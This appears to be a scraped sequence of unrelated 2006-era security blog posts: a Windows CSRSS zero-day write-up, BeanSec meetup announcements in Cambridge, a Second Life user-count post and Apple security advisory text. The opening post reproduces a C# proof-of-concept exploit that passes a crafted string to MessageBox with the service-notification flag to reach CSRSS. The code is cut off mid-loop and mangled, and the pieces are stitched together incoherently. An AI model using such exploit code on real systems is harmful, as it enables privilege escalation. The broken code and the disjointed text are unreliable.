Zeroday 01100100011010010

Feel free to send 50k to my paypal account :)

Russian sites are starting to post proof of concept code now. I had little idea of how trivial this exploit would be to understand but it would seem that error message parameters are used to elevate privledges. If the MB_SERVICE_NOTIFICATION flag is specified when calling the MessageBox function from the Windows API, it will use the NtRaiseHardError syscall to send a HardError message to CSRSS.

// Вариант на C#
// mbox.cs
using System;
using System.Runtime.InteropServices;
class HelloWorldFromMicrosoft
{
[DllImport("user32.dll")]
unsafe public static extern int MessageBoxA(uint hwnd, byte* lpText, byte* lpCaption, uint uType);

static unsafe void Main()
{
byte[] helloBug = new byte[] {0x5C, 0x3F, 0x3F, 0x5C, 0x21, 0x21, 0x21, 0x00};
uint MB_SERVICE_NOTIFICATION = 0x00200000u;
fixed(byte* pHelloBug = &helloBug[0])
{
for(int i=0; i> csc /unsafe mbox.cs
>> mbox.exe

the original exploit code found was impossible to enter into this blog so I’m uploading a picture of it.

We’ve now established a regular schedule for the BeanSec! events; the third Wednesday of each month. So you can mark your calendars now for December 20th at 567 Massachusetts Ave. Upstairs at the Enormous Room from 6-9pm.

For the uninitiated:

BeanSec! is an informal meetup of information security professionals and academics in the Cambridge/Boston area. Unlike other meetings, you will not be expected to pay dues, “join up”, present a zero-day exploit, or defend your dissertation to attend.

The location is the Enormous Room (map) in Cambridge.

Andy J had a really good point. Beansec was just too unpredictable to make plans for and our erratic releases of information were just a little *too* spontaneous. So to appease him and the good folks at Matasano The Chris’ and I have decided that all future Beansec events will occur on the Third Wednesday of the Month.

That’s right, every third Wednesday. So you can mark your calendars now for December 20th at 567 Massachusetts Ave Upstairs at the Enormous Room from 6-9pm.

Full of turkey (or unTurkey) and want to get out and meet other infosec professionals? I confirmed with our awesome host the Enormous Room that we have use of the upstairs area November 29th from 6pm – 9pm. So please come out and meet up with other infosec professionals in the Boston area. If you came out on the 15th please let me know and the first beer/whatever is on me.

Due to unforeseen circumstances the third ever BeanSec! event is going to be moved to a later date. Likely sometime this month. Stay tuned while Chris, Chris, and I come up with a new plan!

Everyone’s favorite Boston Security event is coming back to the Enormous Room on November 15th. That’s Wednesday from 6pm to sometime around 9pm or so. This event is also doubling as a birthday party for yours truly and I will likely stay late into the night. (Dave G, this is the one you should come to Boston for!)

Thanks to everyone who came to Beansec 2! I lost track of the number of people around 14 (Hoff says he counted at least 16) but the sheer amount of new faces was awesome. The next Beansec is currently planned for October 25th at the Enormous Room. Don’t forget to add yourself to the mailing list beansec [at] socketpuppet [dot] org. Also for those who were interested in participating in the security vulnerability research project I spoke about feel free to email me directly at oday [at] fas [dot] harvard

Let us know you are coming! mail to: beansec [at] sockpuppet [dot] org

A group of people who only exist in an online simulation.

400k
by Frans Charming

400k users on the front page, I’m 13 days off on my prediction that we would reach it on the end of July. But what does such a number say anyway, if it is constantly redefined as it has been again on the LL blog.

“The number that is currently on our home page is a time-weighted average between “total number of sign ups ever” and “total number of logged in users over the last 60 days”. As of right now, those numbers are 493,563 and 225,028.”

And I can get 0wned just like you PC.

* ImageIO

CVE-ID: CVE-2006-3459, CVE-2006-3461, CVE-2006-3462, CVE-2006-3465

Available for: Mac OS X v10.4.7 Build 8K1079, Mac OS X Server v10.4.7 Build 8K1079

Impact: Viewing a maliciously-crafted TIFF image may lead to an application crash or arbitrary code execution

Description: Buffer overflows were discovered in TIFF tag handling (CVE-2006-3459, CVE-2006-3465), the TIFF PixarLog decoder (CVE-2006-3461), and the TIFF NeXT RLE decoder (CVE-2006-3462). By carefully crafting a corrupt TIFF image, an attacker can trigger a buffer overflow which may lead to an application crash or arbitrary code execution. This update addresses the issue by performing additional validation of TIFF images. Systems prior to Mac OS X v10.4 are affected only by the TIFF NeXT RLE decoder issue (CVE-2006-3462). Credit to Tavis Ormandy, Google Security Team for reporting this issue.

Note:A fifth issue discovered by Tavis Ormandy, CVE-2006-3460, does not affect Mac OS X.

* OpenSSH

CVE-ID: CVE-2006-0393

Available for: Mac OS X v10.4.7 Build 8K1079, Mac OS X Server v10.4.7 Build 8K1079

Impact: When remote login is enabled, remote attackers may cause a denial of service or determine whether an account exists

Description: Attempting to log in to an OpenSSH server (“Remote Login”) using a nonexistent account causes the authentication process to hang. An attacker can exploit this behavior to detect the existence of a particular account. A large number of such attempts may lead to a denial of service. This update addresses the issue by properly handling attempted logins by nonexistent users. This issue does not affect systems prior to Mac OS X v10.4. Credit to Rob Middleton of the Centenary Institute (Sydney, Australia) for reporting this issue.